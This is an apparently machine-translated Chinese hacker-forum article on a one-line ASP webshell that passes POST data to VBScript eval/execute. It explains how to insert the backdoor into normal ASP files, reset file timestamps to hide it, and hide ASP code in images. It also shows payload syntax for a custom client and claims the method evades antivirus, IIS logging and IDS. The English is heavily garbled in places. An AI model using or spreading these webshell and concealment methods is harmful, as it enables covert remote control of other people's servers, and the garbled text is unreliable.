More compact and more powerful--the Eval version of ASP Trojan principle analysis-vulnerability warning-the black bar safety net

ID MYHACK58:6220066573
Type myhack58
Reporter 佚名
Modified 2006-01-22T00:00:00


WithWebto secure popularity, the administrator prevent WebShellartalso increased, the previous kind is placed directly on a WebShell era is slowly away from us, So now the WebShell more and more attention to its concealment. WebShell hiddenartis also developing very fast, from changing the code case to the C/S mode, are cattle people wisdom crystallization. Say to C/S mode, is not to make you think ASP under the“Execute Request ("#") the”Word of the back door, Oh, today I also talk to you about an ASP in a word the back door, but not execute, but another function-eval. Well, first to talk about the eval Backdoor of the principles and methods of use, not to listen carefully. Even they know in asp there's an execute function specially used to execute the asp code, This is similar to Javascript inside of the eval function. So execute can be used to do into a word Backdoor: execute request("x"). However, when the POST of the parameter x is empty when the execute function will error, so you have to add fault tolerance statement is. Actually VBScript which also has the eval function, do not know can not use it, well, look at its features first:

The Eval function To calculate an expression value and returns the result.

[result = ] Eval(expression) Parameters the result Optional. Is a variable used to receive the returned results. If you do not specify the results, consider using the Execute statement instead.

expression Required. Can contain any valid VBScript expression string.

Tip: In VBScript, x = y there can be two explanations. The first way is an assignment statement, the value of y given x. The second explanation is that the test x and y are equal. If equal, result is True; otherwise the result is False. The Eval method always uses the second interpretation, whereas the Execute statement always uses the first kind. Note that the parameter expression“can contain any valid VBScript expression in the string.” Oh, that is not to imply we eval can execute arbitrary code. But look at that Description, The eval always put the assignment statement is interpreted to determine the sentence, wouldn't it be not brought to the assignment. Oh, it doesn't matter if we get eval to execute by execute arbitrary code execution? Oh, the eval Backdoor! With execute as compared to eval has the advantage that when the parameter is empty will not go wrong, so far the shortest of the ASP Backdoor is“on”. Count it, is not than the previous are short Ah, huh, huh. The eval function is inserted into a normal ASP file, your Backdoor will stay well if you can put the file last modified time modified back is better. Now you can execute arbitrary code, and of course, the code requires you to use the client POST go up. Client with a Web implementation it is convenient. Hai Duong to the top there is a eval of the client, seems to be using the session to save the code and then execute, but I tried several times are not, alas, still to write one. I'm doing this the client and Haiyang different, is composed of various functions, respectively, each of the functions use an htm page that corresponds to a section of code, put in the page the hidden fields. Reference is made to the ice Fox prodigal son that the micro-ASP Backdoor client's website structure, thanks. Previously not say, we have to use eval execute by execute to execute the code. So the hidden field's content is similar to the“execute("response. write(""Hello , World !""): response. write("" "")”--Note the quotation marks the quotation marks Double-write; and execute the character can use carriage return line feed you can also use a colon instead of the carriage return line feed. This is also not enough, we also have to“chop the head to tail.” Chop the head of it is to put our Backdoor code execution before thedatato clear, to tail? is the back door to execute code after thedatato empty, can not let the other uselessdatato impact we look back at the display. This, respectively with the response. clear and response. end to complete. Ok, after some chopping head to tail, our hidden domain it becomes:“the resposne. clear:execute("response. write(""Hello, World!""): response. write("" ""):response. end")” on. Here by the way, last year not a cow made with a#include of a picture of the form to a hidden back door, the picture finally is a section of asp code. At the time not to say that this method is executed after the code will show the picture without the echo? there is actually echo, You take a picture to save with a hex editing software to open, turned back to the display content in the picture at the end. Oh, think about it, with the response. clear you can clear the picture showing the back significantly. The task now is to find the point of ASP back-door code change changes combined with the Javascript into the html file, interested friends look at the code, this will not repeat them here slightly. In addition, the execute function can also use this client. This back-door advantage is the small, hidden high, the virus can not be killing, and all the submitteddatais the POST method, the IIS log will not record; the disadvantage is that each execution of the code will have a large number ofdatais transmitted and the code by execute execution speed will be slower. This code execution another advantage is that you can put the POST code is encrypted, to bypass the IDS, Oh, well, later slightly.